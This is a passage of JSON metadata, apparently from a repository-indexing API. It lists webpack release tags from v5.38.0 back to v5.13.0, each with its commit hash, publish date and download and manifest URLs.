gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fweb